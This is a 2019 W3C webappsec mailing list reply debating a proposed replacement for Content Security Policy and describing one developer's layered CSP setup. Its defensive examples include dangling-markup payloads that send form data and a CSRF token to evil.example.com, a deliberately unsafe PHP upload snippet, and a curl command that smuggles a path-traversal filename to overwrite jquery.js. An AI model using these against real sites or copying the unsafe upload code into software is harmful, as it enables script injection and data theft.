W3C home > Mailing lists > Public > public-webappsec@w3.org > July 2019

Re: A modest content security proposal.

From: Craig Francis <craig.francis@gmail.com>
Date: Thu, 18 Jul 2019 14:03:22 +0100
Message-Id: <D30318B4-B53F-4E3C-85D1-7B49D294B165@gmail.com>
Cc: Web Application Security Working Group <public-webappsec@w3.org>
To: Mike West <mkwst@google.com>
On 16 Jul 2019, at 11:54, Mike West <mkwst@google.com> wrote:

> Thanks for your feedback! I'll concentrate on the resource confinement feedback, as it's the part I've thought least about, and I'd like to understand your perspective!



Thanks for trying to make these problems easier to solve.

Replies about Resource Confinement below...




> On Mon, Jul 15, 2019 at 2:15 PM Craig Francis <craig.francis@gmail.com <mailto:craig.francis@gmail.com>> wrote:
> The bit I feel like I'm missing, and it might be because I enjoy applying multiple layers of protection, is the Resource Confinement side.
> 
> On my websites, I have a folder for static resources (`php_admin_flag engine off`), that's under version control, replaced every time the website is updated (with a diff check before), and it's not writable to by the web server process (so no user uploaded/replaced content) - I like to ensure that all JS/CSS/Images/Fonts are loaded from that safe folder, and I can do that because the CSP specifies specific paths that are served from that locked-down folder.
> 
> It's certainly _possible_ to construct a path-limited policy like this today. As far as I can tell, no one does this at any scale, as it's quite brittle and requires close coordination between teams responsible for different bits of a site. Likewise, the fact that we drop the path after a cross-origin redirect significantly weakens the guarantees we can provide.
> 
> I agree that a pathless proposal is strictly less powerful than CSP, but it seems like a reasonable place to start, given that that's what sites generally seem to have landed on after a few years of experience with CSP.



Dropbox does, e.g. 

    script-src ... https://www.dropbox.com/static/compiled/js/ ...

I'll describe my setup below, but in summary, while the initial setup took a few days, I was able to start with hostname only, and then I switched to path based restrictions one at a time.

And once paths were setup, maintenance has been really easy (especially if the tooling exists to easily add paths to the CSP).



> A possible solution would be a second domain, but that would slow the page load time a little bit, make the server config a bit more complex, and might lose some restrictions - such as the user-uploaded images folder containing a malicious JavaScript file (will I need a different domain for each resource type?).
> 
> I'm curious about the value you see here. It seems that script injection is cleanly dealt with via the `scripting-policy` bits, and any protection you're getting from confinement is additive. It can absolutely reduce risk even further, but it's not clear to me that there's much value in preventing script execution above and beyond pointing only to servers that you trust?


My "trusted" server has a folder for user uploaded content, and I always see that as relatively dangerous.

So I want to be able to tell the browser things like: only on this page can you get images from that folder.

This is useful if the nonce protection is broken - similar to how a single firewall that protects a company network is not considered enough (while it solves most inbound network issues, we assume it could be bypassed).



> I also dynamically set the CSP for every page - e.g. most pages are ok with `connect-src 'none'` (from default-src), but when a page/script needs to use XMLHttpRequest, then I explicitly set the full URL for the 1 API it needs to access.
> 
> This is a lot of work! :)


Depends on the website... for my websites, it's only ~25 lines :-)



> The intention is to have layers... 1. my server side code shouldn't have any XSS vulnerabilities; if it does, 2. CSP should stop the loading of scripts; if that fails (e.g. a legitimate script was replaced by a hacker), 3. that script should be limited in what it can do to that page.
> 
> Nothing in this proposal (or CSP) limits the capability of a script to modify a given page. They both seem to limit the ability of a script to pull in resources, and potentially to exfiltrate data.


True, modifying the current page isn't great, and I don't think there is a way to stop that.

It does limit the script in getting information, and then applying modifications based on that, or pulling in even more resources (e.g. a crypto miner).

But if that page contains sensitive data (e.g. information about someones disabilities), I want to do everything I can to stop that data getting out.

Admittedly I'm sure there are still ways of exfiltrating, but my current CSP should make it difficult if the attacker has *only* managed to get JavaScript execution.

That's where I would like the Resource Confinement to focus on... let's say the nonce based XSS Mitigation has failed, what now? do we just let the malicious JS do whatever it wants?



> This also applies to limiting what content can be loaded in frames (e.g. blocking an iframe from showing a malicious login form, which is why I have frame-src 'none' for most pages).
> 
> Presumably we'd add some sort of `frames` category to `Confinement-Policy` to support this specific thing. 


That would be a good.



> And finally, some DOM messing around can cause issues:
> 
>    <form action="https://evil.example.com <https://evil.example.com/>">
>    <form action="./">
>       <input name="password" />
>    </form>
> 
>    <img src='https://evil.example.com <https://evil.example.com/><form action="./"><input name="csrf" value="abc123" />...' />...
> 
> These are indeed problems (along with the rest of http://lcamtuf.coredump.cx/postxss/ <http://lcamtuf.coredump.cx/postxss/>).


I'm fairly sure that's where I saw those problems first... but due to the CSP restrictions I've been able to add, with paths, I think I've got those issues covered as well (via form-action, img-src, and other things).



> Maybe introduce Scripting-Policy first; then deprecate the old/un-necessary parts of CSP, but still keep CSP around with a focus on Resource Confinement?
> 
> `Scripting-Policy` is the bit I'm most interested in, to be sure. I'm interested in `Confinement-Policy` mostly as a way to support the belt-and-suspenders approach noted in https://csp.withgoogle.com/docs/faq.html#strict-dynamic-with-whitelists <https://csp.withgoogle.com/docs/faq.html#strict-dynamic-with-whitelists>.
> 
> I think it will be difficult to use `Scripting-Policy` with CSP's `script-src` directive (or, at least, I'd consider it a non-goal to make that interaction simple and easy). If we're going to run in this direction, I'd prefer to just do one thing. Obviously we wouldn't dump CSP tomorrow, but I don't think keeping both around forever is a reasonable plan.



That's a good example.

The `Scripting-Policy` header should be the developers first and main focus, where I think it would help mitigate *most* of the XSS problems.

But I'd still like to apply strict Resource Confinement.

Maybe the recommendation to developers should be that the CSP header is added by websites that want/need to apply those extra restrictions?

I think the current CSP syntax works well for that, it already gives you host based restrictions, it already allows you to add path restrictions, and it does it by resource type.

Doing the nonce part separately, and deprecating things which aren't needed any more, will leave a fairly good Confinement-Policy.


---


As to the websites I build, this is perhaps going a bit off topic, but might be useful...

They average about ~75,000 lines of code.

They work mostly on reports, customer/student data, invoices, time sheets, etc.

Nothing particularly exciting, mostly simple forms, but those pages hold very sensitive/personal data, so I'm really interested in keeping that safe.

The current CSP is created dynamically for every page.

I start with `default-src 'none'`.

I add a few base rules - like the paths to my static CSS/JS folders.

Then, whenever I need an exception, like JS needing to use an API, I just need to add something like:

    $response->csp_source_add('connect-src', '/api/clipboard/');

If I don't do this, it won't work, which is kind of noticeable when building new features :-)

I think this is why I enjoy working with CSP, it allows me to be as restrictive as I want to be (the current proposal unfortunately drops most of those restrictions).

And I'm looking forward to being able to set a baseline and fallback CSP via Origin-Policy (the baseline will probably be host only, and I'm wondering if the fallback could simply be 'none').

Unfortunately I do have to accept user uploaded content, and I see this as very dangerous.

For example, on a poorly created website you might find something like:

    move_uploaded_file(
        $_FILES['image']['tmp_name'],
        '/www/public/uploads/' . $_FILES['image']['name']);

The intention is to keep the name of the uploaded file (e.g. "sunset.jpg" or "evil.js"), which is a bad idea.

The attacker could also set the file name to "../js/jquery.js" to replace a JS file that receives a nonce - so the attacker now has script execution on any page that includes that jquery.js file.

    curl -F 'image=@/tmp/evil.js;filename=../js/jquery.js' https://...

Technically this attack won't actually work in PHP, as it strips everything before and including the last "/" - but that's relying on a safety feature that not all programming languages have.

This is why I make sure the web-server process can only write to certain folders (with a script that checks every night), so it ensures something running under the "www-data" account cannot replace my JS files.

I also re-name files during file upload process (based on the record id), and re-saves images in a known good file format (just incase the image contains something malicious that could exploit a browsers rendering process).

And even more off tangent, if someone did find a way to create a ".js" file in the uploads folder, I've setup Apache to set a mime type of "application/octet-stream", nosniff, and Content-Disposition attachment for any files not matching "\.(?i:gif|jpe?g|png)$".

Recently I've updated my sites so the <head> starts with the <script> tags (async, with integrity), then immediately follows up with:

    <meta http-equiv="Content-Security-Policy" content="script-src 'none'" />

I skip this for Edge (as it has a few issues), but it means that no <script> tags will be allowed later in the HTML (even if an XSS tried to include a script that is valid elsewhere).

My next step is to use paths for `form-action`, which is one of my last uses of 'self'.

That said, I already have a CSRF token check that's hashed with the form action (so changing the form action will fail the CSRF checks). But where I have a common bit of code that creates the <form> tags for all of my websites, it could add to the CSP header automatically (I'm hoping that's about 3 lines of code for all sites, but I need to check it first).

Thanks,
Craig
Received on Thursday, 18 July 2019 13:03:49 UTC

This archive was generated by hypermail 2.3.1 : Thursday, 18 July 2019 13:03:50 UTC